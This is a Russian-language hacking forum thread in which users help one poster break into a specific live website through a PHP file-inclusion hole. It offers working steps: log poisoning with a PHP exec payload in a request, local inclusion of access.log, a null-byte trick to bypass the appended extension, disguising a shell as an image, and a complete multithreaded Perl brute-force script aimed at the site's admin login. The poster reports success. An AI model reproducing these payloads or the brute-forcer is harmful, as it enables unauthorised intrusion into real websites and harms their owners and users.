Вообщем нашел сайтег.... довольно популярный... там php инклюдинг... При вводе несуществующей страницы вылитает

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /hosting/www/main/samp/v2/index.php on line 369

Warning: include(http://someweb.com/shell.php) [function.include]: failed to open stream: no suitable wrapper could be found in /hosting/www/main/samp/v2/index.php on line 369

Warning: include() [function.include]: Failed opening 'http://someweb.com/shell.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /hosting/www/main/samp/v2/index.php on line 369




Инклюд типа

someweb.ru/v2/index.php?page=http://someweb.com/shell&lang=ru&PHPSESSID=0548fe13c6b6c63e4bbd59538e1c77da



Есть какие либо варианты как залить шелл ?

Удаленный инклюд запрещен, попробуй залить шелл, к примеру, как картинку, и проинклюдь его.

ps: _http://www.dyc.lv ? :D

попробуй залить через логи,
только учти попытка будет всего одна ;)
а потом проведи локальный инклуд.

попробуй залить через логи,
только учти попытка будет всего одна ;)
а потом проведи локальный инклуд.

Эт как ? :P Что ты имееш в виду ? :D

например делаешь запрос к существующей странице
www.site.com/index.php?myadd=<?php exec($_GET['cmd']) ?>

этот запрос должен попасть в access.log
после этого нужно этот аксес-лог проинклудить.

и по идее утебя получится мини шелл... после этого можешь уже загрузить чтото посущественнее.

...или пробрути (perl; в password.txt пароли):
#! /usr/bin/perl -w

use IO::Socket;
use warnings;
use threads;
use threads::shared;
use Fcntl ':flock';

print "
simple brute
by eLwaux
\n";

my $threads = 10;
my $host = 'dyc.lv';
my $login = 'http://www.dyc.lv/v2/admins.php';

open (FILE, '<password.txt') || die(" [-] icqmailc.com.pass.txt not found!\n");
my @pas : shared = <FILE>;
chomp(@pas);
close(FILE);

$time = time;
printf " [ ] started [".localtime()."]\n\n";

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

$time = time-$time;
printf "\n [ ] finished [".localtime()."]\n";
printf " [i] time elapsed: $time sec\n";

<stdin>;

sub Brut{

while(@pas)
{
{lock(@pas);$pasw = shift @pas;}

$post = 'parole='.$pasw;
$header =
"POST ".$login." HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"User-Agent: mde\r\n".
"Referer: ".$login."\r\n".
"Cookie: hello=world;\r\n".
"Content-Length: ".length($post)."\r\n\r\n".
"$post\r\n\r\n";

my $sock = sock();
print $sock $header;

my $answ;
while(my $answer = <$sock>){$answ.=$answer;}

if (length($answ)==947) {print ' - ';}
else {print ' +++++++++++ ';}
print $pasw."\n";

close($sock);
}
}

#create new socket connection
sub sock {
my $sock;
do {
$sock = new IO::Socket::INET
(
PeerAddr => $host,
PeerPort => 80,
PeerProto => 'tcp',
TimeOut => 10
) or print "[-] connection error!";
} while (!$sock);
return $sock;
}
:D

Да в том то и прикол что он после названия добавляет еще и .php

%00
?cmd=http://site.ua/shell.php?

УРА! Спасибо у меня получилось.
Скрин:
http://bildem.lv/bildes/04c347ced80b51dee333d8263bf7f6cc.JPG
А у вас?

Сбрутил что ли? о_0